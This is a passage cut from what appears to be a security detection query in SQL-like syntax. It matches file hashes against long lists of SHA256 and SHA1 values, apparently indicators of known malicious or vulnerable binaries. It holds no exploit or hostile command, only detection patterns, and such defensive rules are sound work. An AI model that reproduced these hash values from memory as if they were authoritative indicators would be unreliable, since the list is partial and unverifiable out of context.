'\\' OR Hashes LIKE '%SHA256=771a8d05f1af6214e0ef0886662be500ee910ab99f0154227067fddcfe08a3dd%' ESCAPE '\\' OR Hashes LIKE '%SHA256=927c2a580d51a598177fa54c65e9d2610f5f212f1b6cb2fbf2740b64368f010a%' ESCAPE '\\' OR Hashes LIKE '%SHA256=42851a01469ba97cdc38939b10cf9ea13237aa1f6c37b1ac84904c5a12a81fa0%' ESCAPE '\\' OR Hashes LIKE '%SHA256=e6db8a1c9d82d18b948c7135439fdeaa9bc02ea97509e3534de65e5481489220%' ESCAPE '\\' OR Hashes LIKE '%SHA256=1062211314088012edb9fe65780e35e7b3144ac45021269fc993ef2931c8584b%' ESCAPE '\\' OR Hashes LIKE '%SHA256=029dbf6d8dc920a32b3c7a2057513d3741b20b7f6e7aa23b113859a8049214df%' ESCAPE '\\' OR Hashes LIKE '%SHA256=1d053020079124ac526d84affb17bf4a1563ecd872c83b4b6299c9aa6a732557%' ESCAPE '\\' OR Hashes LIKE '%SHA256=c059f1b2b73ecab48d62f469d48dbde74a80c4ada07f0bd3b417ec4e044fb522%' ESCAPE '\\' OR Hashes LIKE '%SHA256=a66d2fb7ef7350ea74d4290c57fb62bc59c6ea93f759d4ca93c3febca7aeb512%' ESCAPE '\\' OR Hashes LIKE '%SHA256=5d712d3fad791bdc67502ed7c6586ca39d12ae26c7b245c36effec92e3cda08e%' ESCAPE '\\' OR Hashes LIKE '%SHA256=e61004335dfe7349f2b2252baa1e111fb47c0f2d6c78a060502b6fcc92f801e4%' ESCAPE '\\' OR Hashes LIKE 
'%SHA256=7c0f77d103015fc29379ba75d133dc3450d557b0ba1f7495c6b43447abdae230%' ESCAPE '\\' OR Hashes LIKE '%SHA256=97363f377aaf3c01641ac04a15714acbec978afb1219ac8f22c7e5df7f2b2d56%' ESCAPE '\\' OR Hashes LIKE '%SHA256=8e6363a6393eb4234667c6f614b2072e33512866b3204f8395bbe01530d63f2f%' ESCAPE '\\' OR Hashes LIKE '%SHA256=09b0e07af8b17db1d896b78da4dd3f55db76738ee1f4ced083a97d737334a184%' ESCAPE '\\' OR Hashes LIKE '%SHA256=2a4f4400402cdc475d39389645ca825bb0e775c3ecb7c527e30c5be44e24af7d%' ESCAPE '\\' OR Hashes LIKE '%SHA256=5f69d6b167a1eeca3f6ac64785c3c01976ee7303171faf998d65852056988683%' ESCAPE '\\' OR Hashes LIKE '%SHA256=f877296e8506e6a1acbdacdc5085b18c6842320a2775a329d286bac796f08d54%' ESCAPE '\\' OR Hashes LIKE '%SHA256=2d2c7ee9547738a8a676ab785c151e8b48ed40fe7cf6174650814c7f5f58513b%' ESCAPE '\\' OR Hashes LIKE '%SHA256=1ae328c88cf49072c125f41b16c2a2063203b21164245e2850ca491bdd4a522e%' ESCAPE '\\' OR Hashes LIKE '%SHA256=84b4e202c6ce1b08cda1b5e7cd3c3b073155120d80141b2055a1a98a4a18dc42%' ESCAPE '\\' OR Hashes LIKE '%SHA256=0ea78cb430fbf8ef4c9f3d1eadf2b057939081b1367bc6610e918fa3c6d8920c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=a2571531c6b384003bad06003be01e75fcd489b7b2d04c3d072b10f08f50b33b%' ESCAPE '\\' OR Hashes LIKE '%SHA256=4d07f9ecd2540218194874427155a4dc82613574672b55257a321f80e7c9f219%' ESCAPE '\\' OR Hashes LIKE '%SHA256=6d14ae56e140c02f5d1e6df5351b87ac0f4b7e9dc5a3d778a1e399cb7878802a%' ESCAPE '\\' OR Hashes LIKE '%SHA256=c4310708ee81058286be30db1b1d93deab62a37eaa7974750a7ffbe798eed747%' ESCAPE '\\' OR Hashes LIKE '%SHA256=d3d88be19bbb889af859c6189b0750a4e527891f95b0dd2e33cb987ec9784f34%' ESCAPE '\\' OR Hashes LIKE '%SHA256=3313e8d7f276a48fbc9cbdb5bcd013fd79a674da6638327c6342a5c5a3bfa893%' ESCAPE '\\') OR sha1 IN ('2261198385d62d2117f50f631652eded0ecc71db', '8db869c0674221a2d3280143cbb0807fac08e0cc', '27d3ebea7655a72e6e8b95053753a25db944ec0f', '33cdab3bbc8b3adce4067a1b042778607dce2acd', '21e6c104fe9731c874fab5c9560c929b2857b918', 
'd979353d04bf65cc92ad3412605bc81edbb75ec2', '2f991435a6f58e25c103a657d24ed892b99690b8', 'f02af84393e9627ba808d4159841854a6601cf80', 'bb962c9a8dda93e94fef504c4159de881e4706fe', 'b97a8d506be2e7eaa4385f70c009b22adbd071ba', '92f251358b3fe86fd5e7aa9b17330afa0d64a705', '8b6aa5b2bff44766ef7afbe095966a71bc4183fa', 'af6e1f2cfb230907476e8b2d676129b6d6657124', 'fcde5275ee1913509927ce5f0f85e6681064c9d2', '00a442a4305c62cefa8105c0b4c4a9a5f4d1e93b', '6523b3fd87de39eb5db1332e4523ce99556077dc', '72966ca845759d239d09da0de7eebe3abe86fee3', '57511ef5ff8162a9d793071b5bf7ebe8371759de', '2d503a2457a787014a1fdd48a2ece2e6cbe98ea7', '400f833dcc2ef0a122dd0e0b1ec4ec929340d90e', '89cd760e8cb19d29ee08c430fb17a5fd4455c741', '1d0df45ee3fa758f0470e055915004e6eae54c95', 'd5fd9fe10405c4f90235e583526164cd0902ed86', 'c52cef5b9e1d4a78431b7af56a6fdb6aa1bcad65', '609fa1efcf61e26d64a5ceb13b044175ab2b3a13', '7d7c03e22049a725ace2a9812c72b53a66c2548b', 'f9519d033d75e1ab6b82b2e156eafe9607edbcfb', '468e2e5505a3d924b14fedee4ddf240d09393776', '2e3de9bff43d7712707ef8a0b10f7e4ad8427fd8', 'c9cbfdd0be7b35751a017ec59ff7237ffdc4df1f', '078ae07dec258db4376d5a2a05b9b508d68c0123', '623cd2abef6c92255f79cbbd3309cb59176771da', '1f3a9265963b660392c4053329eb9436deeed339', '4a235f0b84ff615e2879fa9e0ec0d745fcfdaa5c', 'ace6b9e34e3e2e73fe584f3bbdb4e4ec106e0a7d', '4268f30b79ce125a81d0d588bef0d4e2ad409bbb', 'c834c4931b074665d56ccab437dfcc326649d612', '8f5cd4a56e6e15935491aa40adb1ecad61eafe7c', '51b60eaa228458dee605430aae1bc26f3fc62325', '3270720a066492b046d7180ca6e60602c764cac7', '2a6e6bd51c7062ad24c02a4d2c1b5e948908d131', '19bd488fe54b011f387e8c5d202a70019a204adf', 'a6fe4f30ca7cb94d74bc6d42cdd09a136056952e', 'ea877092d57373cb466b44e7dbcad4ce9a547344', '205c69f078a563f54f4c0da2d02a25e284370251', 'f9feb60b23ca69072ce42264cd821fe588a186a6', 'b25170e09c9fb7c0599bfba3cf617187f6a733ac', '160c96b5e5db8c96b821895582b501e3c2d5d6e7', 'a2e0b3162cfa336cd4ab40a2acc95abe7dc53843', '4e826430a1389032f3fe06e2cc292f643fb0c417', 
'7ab4565ba24268f0adadb03a5506d4eb1dc7c181', 'dc7b022f8bd149efbcb2204a48dce75c72633526', '0307d76750dd98d707c699aee3b626643afb6936', '5711c88e9e64e45b8fc4b90ab6f2dd6437dc5a8a', '6714380bc0b8ab09b9a0d2fa66d1b025b646b946', '8626ab1da6bfbdf61bd327eb944b39fd9df33d1d', '30a224b22592d952fbe2e6ad97eda4a8f2c734e0', 'c95db1e82619fb16f8eec9a8209b7b0e853a4ebe', 'fe1d909ab38de1389a2a48352fd1c8415fd2eab0', 'b4d1554ec19504215d27de0758e13c35ddd6db3e', '5dd2c31c4357a8b76db095364952b3d0e3935e1d', 'ecb4d096a9c58643b02f328d2c7742a38e017cf0', '4a705af959af61bad48ef7579f839cb5ebd654d2', 'd2e6fc9259420f0c9b6b1769be3b1f63eb36dc57', 'c948ae14761095e4d76b55d9de86412258be7afd', 'ddbe809b731a0962e404a045ab9e65a0b64917ad', '745bad097052134548fe159f158c04be5616afc2', '8d59fd14a445c8f3f0f7991fa6cd717d466b3754', '2dfcb799b3c42ecb0472e27c19b24ac7532775ce', 'cc51be79ae56bc97211f6b73cc905c3492da8f9d', 'ac13941f436139b909d105ad55637e1308f49d9a', '2b0bb408ff0e66bcdf6574f1ca52cbf4015b257b', 'cc0e0440adc058615e31e8a52372abadf658e6b1', '5520ac25d81550a255dc16a0bb89d4b275f6f809', '6afc6b04cf73dd461e4a4956365f25c1f1162387', '4b009e91bae8d27b160dc195f10c095f8a2441e1', '6003184788cd3d2fc624ca801df291ccc4e225ee', '0466e90bf0e83b776ca8716e01d35a8a2e5f96d3', 'e6305dddd06490d7f87e3b06d09e9d4c1c643af0', '89909fa481ff67d7449ee90d24c167b17b0612f1', 'd7e8aef8c8feb87ce722c0b9abf34a7e6bab6eb4', '5e6ddd2b39a3de0016385cbd7aa50e49451e376d', '976777d39d73034df6b113dfce1aa6e1d00ffcfd', '9c6749fc6c1127f8788bff70e0ce9062959637c9', '53acd4d9e7ba0b1056cf52af0d191f226eddf312', '3abb9d0a9d600200ae19c706e570465ef0a15643', '27eab595ec403580236e04101172247c4f5d5426', '78b9481607ca6f3a80b4515c432ddfe6550b18a8', '414cd15d6c991d19fb5be02e3b9fb0e6c5ce731c', 'd9c09dd725bc7bc3c19b4db37866015817a516ef', '9c256edd10823ca76c0443a330e523027b70522d', '35829e096a15e559fcbabf3441d99e580ca3b26e', 'b8de3a1aeeda9deea43e3f768071125851c85bd0', '054a50293c7b4eea064c91ef59cf120d8100f237', 'd94f2fb3198e14bfe69b44fb9f00f2551f7248b2', 
'01a578a3a39697c4de8e3dab04dba55a4c35163e', '14bf0eaa90e012169745b3e30c281a327751e316', 'f50c6b84dfb8f2d53ba3bce000a55f0a486c0e79', '6100eb82a25d64a7a7702e94c2b21333bc15bd08', 'bf87e32a651bdfd9b9244a8cf24fca0e459eb614', '28b1c0b91eb6afd2d26b239c9f93beb053867a1a', '879fcc6795cebe67718388228e715c470de87dca', '1f7501e01d84a2297c85cb39880ec4e40ac3fe8a', '152b6bb9ffd2ffec00cc46f5c6e29362d0e66e67', '5f8356ffa8201f338dd2ea979eb47881a6db9f03', 'a7bd05de737f8ea57857f1e0845a25677df01872', 'cce9b82f01ec68f450f5fe4312f40d929c6a506e', 'e35a2b009d54e1a0b231d8a276251f64231b66a3', '37364cb5f5cefd68e5eca56f95c0ab4aff43afcc', 'd62fa51e520022483bdc5847141658de689c0c29', '93aa3bb934b74160446df3a47fa085fd7f3a6be9', 'ec4cc6de4c779bb1ca1dd32ee3a03f7e8d633a9b', '35f1ba60ba0da8512a0b1b15ee8e30fe240d77cd', '3805e4e08ad342d224973ecdade8b00c40ed31be', '65d8a7c2e867b22d1c14592b020c548dd0665646', 'c8d87f3cd34c572870e63a696cf771580e6ea81b', 'c4d7fb9db3c3459f7e8c0e3d48c95c7c9c4cff60', 'd34a7c497c603f3f7fcad546dc4097c2da17c430', '1fd7f881ea4a1dbb5c9aeb9e7ad659a85421745b', '0b8b83f245d94107cb802a285e6529161d9a834d', 'c969f1f73922fd95db1992a5b552fbc488366a40', 'ac600a2bc06b312d92e649b7b55e3e91e9d63451', 'da9cea92f996f938f699902482ac5313d5e8b28e', '33285b2e97a0aeb317166cce91f6733cf9c1ad53', '21edff2937eb5cd6f6b0acb7ee5247681f624260', 'f052dc35b74a1a6246842fbb35eb481577537826', 'f0c463d29a5914b01e4607889094f1b7d95e7aaf', '0c26ab1299adcd9a385b541ef1653728270aa23e', 'f36a47edfacd85e0c6d4d22133dd386aee4eec15', '460008b1ffd31792a6deadfa6280fb2a30c8a5d2', '738b7918d85e5cb4395df9e3f6fc94ddad90e939', '43419df1f9a07430a18c5f3b3cc74de621be0f8e', '558aad879b6a47d94a968f39d0a4e3a3aaef1ef1', '7fb52290883a6b69a96d480f2867643396727e83', 'f5696fb352a3fbd14fb1a89ad21a71776027f9ab', '693a2645c28fc3b248fda95179c36c3ac64f6fc2', '05c0c49e8bcf11b883d41441ce87a2ee7a3aba1d', 'd25340ae8e92a6d29f599fef426a2bc1b5217299', '7c1b25518dee1e30b5a6eaa1ea8e4a3780c24d0c', 'fe10018af723986db50701c8532df5ed98b17c39', 
'bfe55cacc7c56c9f7bd75bdb4b352c0b745d071b', 'a21c84c6bf2e21d69fa06daaf19b4cc34b589347', '82ba5513c33e056c3f54152c8555abf555f3e745', 'd098600152e5ee6a8238d414d2a77a34da8afaaa', '64e4ac8b9ea2f050933b7ec76a55dd04e97773b4', 'bbc1e5fd826961d93b76abd161314cb3592c4436', '90a76945fd2fa45fab2b7bcfdaf6563595f94891', 'b03b1996a40bfea72e4584b82f6b845c503a9748', 'c771ea59f075170e952c393cfd6fc784b265027c', 'cb44c6f0ee51cb4c5836499bc61dd6c1fbdf8aa1', '0918277fcdc64a9dc51c04324377b3468fa1269b', 'b09bcc042d60d2f4c0d08284818ed198cededa04', '8dc2097a90eb7e9d6ee31a7c7a95e7a0b2093b89', '15df139494d2c40a645fb010908551185c27f3c5', '012db3a80faf1f7f727b538cbe5d94064e7159de', 'd04e5db5b6c848a29732bfd52029001f23c3da75', '490109fa6739f114651f4199196c5121d1c6bdf2', 'b4d014b5edd6e19ce0e8395a64faedf49688ecb5', 'a87d6eac2d70a3fbc04e59412326b28001c179de', '3f223581409492172a1e875f130f3485b90fbe5f', '5db61d00a001fd493591dc919f69b14713889fc5', '9923c8f1e565a05b3c738d283cf5c0ed61a0b90f', '15d1a6a904c8409fb47a82aefa42f8c3c7d8c370', '9d07df024ec457168bf0be7e0009619f6ac4f13c', '9a35ae9a1f95ce4be64adc604c80079173e4a676', 'c6bd965300f07012d1b651a9b8776028c45b149a', 'e83458c4a6383223759cd8024e60c17be4e7c85f', 'cb3de54667548a5c9abf5d8fa47db4097fcee9f1', '9c24dd75e4074041dbe03bf21f050c77d748b8e9', 'dc55217b6043d819eadebd423ff07704ee103231', 'e92817a8744ebc4e4fa5383cdce2b2977f01ecd4', 'dc0e97adb756c0f30b41840a59b85218cbdd198f', '26c4a7b392d7e7bd7f0a2a758534e45c0d9a56ab', 'd0d39e1061f30946141b6ecfa0957f8cc3ddeb63', 'c6d349823bbb1f5b44bae91357895dba653c5861', 'f42f28d164205d9f6dab9317c9fecad54c38d5d2', 'bbc0b9fd67c8f4cefa3d76fcb29ff3cef996b825', '8183a341ba6c3ce1948bf9be49ab5320e0ee324d', 'eb1ecad3d37bb980f908bf1a912415cff32e79e6', 'eb0d45aa6f537f5b2f90f3ad99013606eafcd162', '6053d258096bccb07cb0057d700fe05233ab1fbb', '29a190727140f40cea9514a6420f5a195e36386b', 'a4b2c56c12799855162ca3b004b4b2078c6ecf77', '7667b72471689151e176baeba4e1cd9cd006a09a', 'd7f7594ff084201c0d9fa2f4ef1626635b67bce5', 
'99201c9555e5faf6e8d82da793b148311f8aa4b8', '947db58d6f36a8df9fa2a1057f3a7f653ccbc42e', '6a3d3b9ab3d201cd6b0316a7f9c3fb4d34d0f403', 'd702d88b12233be9413446c445f22fda4a92a1d9', '910cb12aa49e9f35ecc4907e8304adf0dcca8cf1', '643383938d5e0d4fd30d302af3e9293a4798e392', 'c4ed28fdfba7b8a8dfe39e591006f25d39990f07', 'b0032b8d8e6f4bd19a31619ce38d8e010f29a816', 'db6245578ec57bd767b27ecf8085095e1c8e5a6e', '166759fd511613414d3213942fe2575b926a6226', '02a8b74899591da7b7f49c0450328d39b939d7e4', '98ceed786f79288becc08c3b82c57e8d4bfa1bca', 'f6b3577ea4b1a5641ae3421151a26268434c3db8', '4de33d03fee52f396a1c788000ca868d56ac30de', 'c6920171fa6dff2c17eb83befb5fd28e8dddf5f0', 'fbc6d2448739ddec35bb5d6c94b46df4148f648d', '6b54f8f137778c1391285fee6150dfa58a8120b1', '943593e880b4d340f2548548e6e673ef6f61eed3', '5ac4d0e2381fc4a8aebe94a0fb6fe5e7558e4dcd', 'e44297a2b750ec1958bef265e2f1ae6fa4323b28', 'aa2ea973bb248b18973e57339307cfb8d309f687', '3a5d176c50f97b71d139767ed795d178623f491d', '25d812a5ece19ea375178ef9d60415841087726e', '3795e32592ab6d8074b6f7ad33759c6a39b0df07', 'fc121ed6fb37e97a004b6faf217435b772dfc4c0', 'ab2b8602e4baef828b58b995d0889a8e5b8dbd02', 'cf040040628b58f4a811f98c2690913c1e8e4e3c', '3296844d22c87dd5eba3aa378a8242b41d59db7a', 'bc47e15537fa7c32dfefd23168d7e1741f8477ed', 'cb22723faa5ae2809476e5c5e9b9a597b26cab9b', 'f3c5e723ae009b336cd2719137b8cd194c9ee51d', '41f2d0f9863bce8920c207b1ef5d3d32b603edef', 'eb93d2f564fea9b3dc350f386b45de2cd9a3e001', '3cd037fbba8aae82c1b111c9f8755349c98bcb3c', '9401389fba314d1810f83edce33c37e84a78e112', '7eb34cc1fcffb4fdb5cb7e97184dd64a65cb9371', '16d7ecf09fc98798a6170e4cef2745e0bee3f5c7', 'fcd615df88645d1f57ff5702bd6758b77efea6d0', 'f3db629cfe37a73144d5258e64d9dd8b38084cf4', 'a00e444120449e35641d58e62ed64bb9c9f518d2', '38571f14fc014487194d1eecfa80561ee8644e09', '4d41248078181c7f61e6e4906aa96bbdea320dc2', '3599ea2ac1fa78f423423a4cf90106ea0938dde8', '3d6d53b0f1cc908b898610227b9f1b9352137aba', '4c18754dca481f107f0923fb8ef5e149d128525d', 
'8c377ab4eebc5f4d8dd7bb3f90c0187dfdd3349f', 'cde32654a041fedc7b0fa1083f6005b950760062', '5fb9421be8a8b08ec395d05e00fd45eb753b593a', 'b480c54391a2a2f917a44f91a5e9e4590648b332', '4f7a8e26a97980544be634b26899afbefb0a833c', 'c1d5cf8c43e7679b782630e93f5e6420ca1749a7', 'a7e9a4686aa7291331e2c8708882c8d81d05264f', '7ba19a701c8af76988006d616a5f77484c13cb0a', '4243dbbf6e5719d723f24d0f862afd0fcb40bc35', '00b4e8b7644d1bf93f5ddb5740b444b445e81b02', 'fd833f3fe2fa396878033b9e6054725248bf9881', 'db446af0e34259e95f4db112a9f06177e1eef4e0', '39d7b121bc654a0de891225e0f8b7b5537c24931', 'd0a228ed8af190dec0c1a812e212f5e68ee3b43e', '7d2fc1a6729521e5c76f659e4c398e2061f7ed5e', 'f999709e5b00a68a0f4fa912619fe6548ad0c42d', '06232f7ea7ea24102d452427aedbbc8b8e188a0c', 'a380aeb3ffaecc53ca48bb1d4d622c46f1de7962', '4927d843577bada119a17b249ff4e7f5e9983a92', 'e5114fd50904c7fb75d8c86367b9a2dd4f79dfb1', '3ccf1f3ac636a5e21b39ede48ff49fa23e05413f', '755349d56cdd668ca22eebc4fc89f0cccef47327', '56af49e030eb85528e82849d7d1b6147f3c4973e', '45a9f95a7a018925148152b888d09d478d56bbf5', '540b9f9a232b9d597138b8e0f33d83f5f6e247af', 'bdfb25cc4ed569dc0d5849545eb4abe08539029f', '28da2ac7c82b999c53f99d55331cfa3624a0bc6f', '5d5f92fba0f39826b527f335a7cca7d363758410', '1858ab7ad1947f5c24b9c913cd975e6dbb536865', '0f2aa3bfdfd699e258382ea1b3c1db1ad7211023', '886a9c16b871da42cdb54c6738a8e088be8b989f', 'c24883645c0589f6171e8ee10080750ac66d75e6', '36d3b09e19477d807a6a5efff89aa6cc8b71bdeb', 'e58dd758e28218e1edb33cd88bb97504972ee221', 'd782ef79266179d2247807857877fabb2e402be5') OR sha256 IN ('04A85E359525D662338CAE86C1E59B1D7AA9BD12B920E8067503723DC1E03162', '05F052C64D192CF69A462A5EC16DDA0D43CA5D0245900C9FCB9201685A2E7748', '4045AE77859B1DBF13972451972EAAF6F3C97BEA423E9E78F1C2F14330CD47CA', '6948480954137987A0BE626C24CF594390960242CD75F094CD6AAA5C2E7A54FA', '8CB62C5D41148DE416014F80BD1FD033FD4D2BD504CB05B90EEB6992A382D58F', 'B1D96233235A62DBB21B8DBE2D1AE333199669F67664B107BFF1AD49B41D9414', 
'7196187FB1EF8D108B380D37B2AF8EFDEB3CA1F6EEFD37B5DC114C609147216D', '7F375639A0DF7FE51E5518CF87C3F513C55BC117DB47D28DA8C615642EB18BFA', '42579A759F3F95F20A2C51D5AC2047A2662A2675B3FB9F46C1ED7F23393A0F00', '2DA330A2088409EFC351118445A824F11EDBE51CF3D653B298053785097FE40E', '436CCAB6F62FA2D29827916E054ADE7ACAE485B3DE1D3E5C6C62D3DEBF1480E7', 'B4D47EA790920A4531E3DF5A4B4B0721B7FEA6B49A35679F0652F1E590422602', 'DDE6F28B3F7F2ABBEE59D4864435108791631E9CB4CDFB1F178E5AA9859956D8', 'B48A309EE0960DA3CAAAAF1E794E8C409993AEB3A2B64809F36B97AAC8A1E62A', '025E7BE9FCEFD6A83F4471BBA0C11F1C11BD5047047D26626DA24EE9A419CDC4', '2AA1B08F47FBB1E2BD2E4A492F5D616968E703E1359A921F62B38B8E4662F0C4', 'ECE0A900EA089E730741499614C0917432246CEB5E11599EE3A1BB679E24FD2C', 'F40435488389B4FB3B945CA21A8325A51E1B5F80F045AB019748D0EC66056A8B', '2A652DE6B680D5AD92376AD323021850DAB2C653ABF06EDF26120F7714B8E08A', '950A4C0C772021CEE26011A92194F0E58D61588F77F2873AA0599DFF52A160C9', '0AAFA9F47ACF69D46C9542985994FF5321F00842A28DF2396D4A3076776A83CB', '47F08F7D30D824A8F4BB8A98916401A37C0FD8502DB308ABA91FE3112B892DCC', 'B9A4E40A5D80FEDD1037EAED958F9F9EFED41EB01ADA73D51B5DCD86E27E0CBF', '5C04C274A708C9A7D993E33BE3EA9E6119DC29527A767410DBAF93996F87369A', '0040153302B88BEE27EB4F1ECA6855039E1A057370F5E8C615724FA5215BADA3', '3326E2D32BBABD69FEB6024809AFC56C7E39241EBE70A53728C77E80995422A5', '36B9E31240AB0341873C7092B63E2E0F2CAB2962EBF9B25271C3A1216B7669EB', '29E0062A017A93B2F2F5207A608A96DF4D554C5DE976BD0276C2590A03BD3E94', '45ABDBCD4C0916B7D9FAAF1CD08543A3A5178871074628E0126A6EDA890D26E0', '50DB5480D0392A7DD6AB5DF98389DC24D1ED1E9C98C9C35964B19DABCD6DC67F', '607DC4C75AC7AEF82AE0616A453866B3B358C6CF5C8F9D29E4D37F844306B97C', '61D6E40601FA368800980801A662A5B3B36E3C23296E8AE1C85726A56EF18CC8', '74A846C61ADC53692D3040AFF4C1916F32987AD72B07FE226E9E7DBEFF1036C4', '76FB4DEAEE57EF30E56C382C92ABFFE2CF616D08DBECB3368C8EE6B02E59F303', '81939E5C12BD627FF268E9887D6FB57E95E6049F28921F3437898757E7F21469', 
'9790A7B9D624B2B18768BB655DDA4A05A9929633CEF0B1521E79E40D7DE0A05B', '9A1D66036B0868BBB1B2823209FEDEA61A301D5DD245F8E7D390BD31E52D663E', 'AA9AB1195DC866270E984F1BED5E1358D6EF24C515DFDB6C2A92D1E1B94BF608', 'AF095DE15A16255CA1B2C27DAD365DFF9AC32D2A75E8E288F5A1307680781685', 'D5586DC1E61796A9AE5E5D1CED397874753056C3DF2EB963A8916287E1929A71', 'D8459F7D707C635E2C04D6D6D47B63F73BA3F6629702C7A6E0DF0462F6478AE2', 'E81230217988F3E7EC6F89A06D231EC66039BDBA340FD8EBB2BBB586506E3293', 'F88EBB633406A086D9CCA6BC8B66A4EA940C5476529F9033A9E0463512A23A57', '1C8DFA14888BB58848B4792FB1D8A921976A9463BE8334CFF45CC96F1276049A', '22418016E980E0A4A2D01CA210A17059916A4208352C1018B0079CCB19AAF86A', '405472A8F9400A54BB29D03B436CCD58CFD6442FE686F6D2ED4F63F002854659', '49F75746EEBE14E5DB11706B3E58ACCC62D4034D2F1C05C681ECEF5D1AD933BA', '4A3D4DB86F580B1680D6454BAEE1C1A139E2DDE7D55E972BA7C92EC3F555DCE2', '4AB41816ABBF14D59E75B7FAD49E2CB1C1FEB27A3CB27402297A2A4793FF9DA7', '54841D9F89E195196E65AA881834804FE3678F1CF6B328CAB8703EDD15E3EC57', '5EE292B605CD3751A24E5949AAE615D472A3C72688632C3040DC311055B75A92', '76B86543CE05540048F954FED37BDDA66360C4A3DDB8328213D5AEF7A960C184', '7F190F6E5AB0EDAFD63391506C2360230AF4C2D56C45FC8996A168A1FC12D457', '845F1E228DE249FC1DDF8DC28C39D03E8AD328A6277B6502D3932E83B879A65A', '84BF1D0BCDF175CFE8AEA2973E0373015793D43907410AE97E2071B2C4B8E2D4', '8EF0AD86500094E8FA3D9E7D53163AA6FEEF67C09575C169873C494ED66F057F', 'A56C2A2425EB3A4260CC7FC5C8D7BED7A3B4CD2AF256185F24471C668853AEE8', 'AC3F613D457FC4D44FA27B2E0B1BAA62C09415705EFB5A40A4756DA39B3AC165', 'B1334A71CC73B3D0C54F62D8011BEC330DFC355A239BF94A121F6E4C86A30A2E', 'B47BE212352D407D0EF7458A7161C66B47C2AEC8391DD101DF11E65728337A6A', 'B9B3878DDC5DFB237D38F8D25067267870AFD67D12A330397A8853209C4D889C', 'DB90E554AD249C2BD888282ECF7D8DA4D1538DD364129A3327B54F8242DD5653', 'E61A54F6D3869B43C4ECEAC3016DF73DF67CCE03878C5A6167166601C5D3F028', '3871E16758A1778907667F78589359734F7F62F9DC953EC558946DCDBE6951E3', 
'80CBBA9F404DF3E642F22C476664D63D7C229D45D34F5CD0E19C65EB41BECEC3', 'BB50818A07B0EB1BD317467139B7EB4BAD6CD89053FECDABFEAE111689825955', 'FF6729518A380BF57F1BC6F1EC0AA7F3012E1618B8D9B0F31A61D299EE2B4339', '3A5EC83FE670E5E23AEF3AFA0A7241053F5B6BE5E6CA01766D6B5F9177183C25', '61A1BDDDD3C512E681818DEBB5BEE94DB701768FC25E674FCAD46592A3259BD0', '07B6D69BAFCFD767F1B63A490A8843C3BB1F8E1BBEA56176109B5743C8F7D357', '21CCDD306B5183C00ECFD0475B3152E7D94B921E858E59B68A03E925D1715F21', '2D83CCB1AD9839C9F5B3F10B1F856177DF1594C66CBBC7661677D4B462EBF44D', 'F581DECC2888EF27EE1EA85EA23BBB5FB2FE6A554266FF5A1476ACD1D29D53AF', 'F8965FDCE668692C3785AFA3559159F9A18287BC0D53ABB21902895A8ECF221B', '3D23BDBAF9905259D858DF5BF991EB23D2DC9F4ECDA7F9F77839691ACEF1B8C4', 'DD4A1253D47DE14EF83F1BC8B40816A86CCF90D1E624C5ADF9203AE9D51D4097', '509628B6D16D2428031311D7BD2ADD8D5F5160E9ECC0CD909F1E82BBBB3234D6', '525D9B51A80CA0CD4C5889A96F857E73F3A80DA1FFBAE59851E0F51BDFB0B6CD', '6DE84CAA2CA18673E01B91AF58220C60AECD5CCCF269725EC3C7F226B2167492', '09BEDBF7A41E0F8DABE4F41D331DB58373CE15B2E9204540873A1884F38BDDE1', '101402D4F5D1AE413DED499C78A5FCBBC7E3BAE9B000D64C1DD64E3C48C37558', '131D5490CEB9A5B2324D8E927FEA5BECFC633015661DE2F4C2F2375A3A3B64C6', '1DDFE4756F5DB9FB319D6C6DA9C41C588A729D9E7817190B027B38E9C076D219', '1E8B0C1966E566A523D652E00F7727D8B0663F1DFDCE3B9A09B9ADFAEF48D8EE', '2BBE65CBEC3BB069E92233924F7EE1F95FFA16173FCEB932C34F68D862781250', '30706F110725199E338E9CC1C940D9A644D19A14F0EB8847712CBA4CACDA67AB', '3124B0411B8077605DB2A9B7909D8240E0D554496600E2706E531C93C931E1B5', '38FA0C663C8689048726666F1C5E019FEAA9DA8278F1DF6FF62DA33961891D2A', '39CFDE7D401EFCE4F550E0A9461F5FC4D71FA07235E1336E4F0B4882BD76550E', '3D9E83B189FCF5C3541C62D1F54A0DA0A4E5B62C3243D2989AFC46644056C8E3', '3F2FDA9A7A9C57B7138687BBCE49A2E156D6095DDDABB3454EA09737E02C3FA5', '47F0CDAA2359A63AD1389EF4A635F1F6EEE1F63BDF6EF177F114BDCDADC2E005', '50D5EAA168C077CE5B7F15B3F2C43BD2B86B07B1E926C1B332F8CB13BD2E0793', 
'56A3C9AC137D862A85B4004F043D46542A1B61C6ACB438098A9640469E2D80E7', '591BD5E92DFA0117B3DAA29750E73E2DB25BAA717C31217539D30FFB1F7F3A52', '5D530E111400785D183057113D70623E17AF32931668AB7C7FC826F0FD4F91A3', '6F1FF29E2E710F6D064DC74E8E011331D807C32CC2A622CBE507FD4B4D43F8F4', '79E2D37632C417138970B4FEBA91B7E10C2EA251C5EFE3D1FC6FA0190F176B57', '85866E8C25D82C1EC91D7A8076C7D073CCCF421CF57D9C83D80D63943A4EDD94', '89B0017BC30CC026E32B758C66A1AF88BD54C6A78E11EC2908FF854E00AC46BE', '9254F012009D55F555418FF85F7D93B184AB7CB0E37AECDFDAB62CFE94DEA96B', '984A77E5424C6D099051441005F2938AE92B31B5AD8F6521C6B001932862ADD7', '98B734DDA78C16EBCAA4AFEB31007926542B63B2F163B2F733FA0D00DBB344D8', '99F4994A0E5BD1BF6E3F637D3225C69FF4CD620557E23637533E7F18D7D6CBA1', '9C10E2EC4F9EF591415F9A784B93DC9C9CDAFA7C69602C0DC860C5B62222E449', 'A961F5939088238D76757669A9A81905E33F247C9C635B908DAAC146AE063499', 'A9706E320179993DADE519A83061477ACE195DAA1B788662825484813001F526', 'B7A20B5F15E1871B392782C46EBCC897929443D82073EE4DCB3874B6A5976B5D', 'CC586254E9E89E88334ADEE44E332166119307E79C2F18F6C2AB90CE8BA7FC9B', 'CD4A249C3EF65AF285D0F8F30A8A96E83688486AAB515836318A2559757A89BB', 'CF4B5FA853CE809F1924DF3A3AE3C4E191878C4EA5248D8785DC7E51807A512B', 'D0BD1AE72AEB5F3EABF1531A635F990E5EAAE7FDD560342F915F723766C80889', 'D8B58F6A89A7618558E37AFC360CD772B6731E3BA367F8D58734ECEE2244A530', 'D92EAB70BCECE4432258C9C9A914483A2267F6AB5CE2630048D3A99E8CB1B482', 'E005E8D183E853A27AD3BB56F25489F369C11B0D47E3D4095AAD9291B3343BF1', 'E68D453D333854787F8470C8BAEF3E0D082F26DF5AA19C0493898BCF3401E39A', 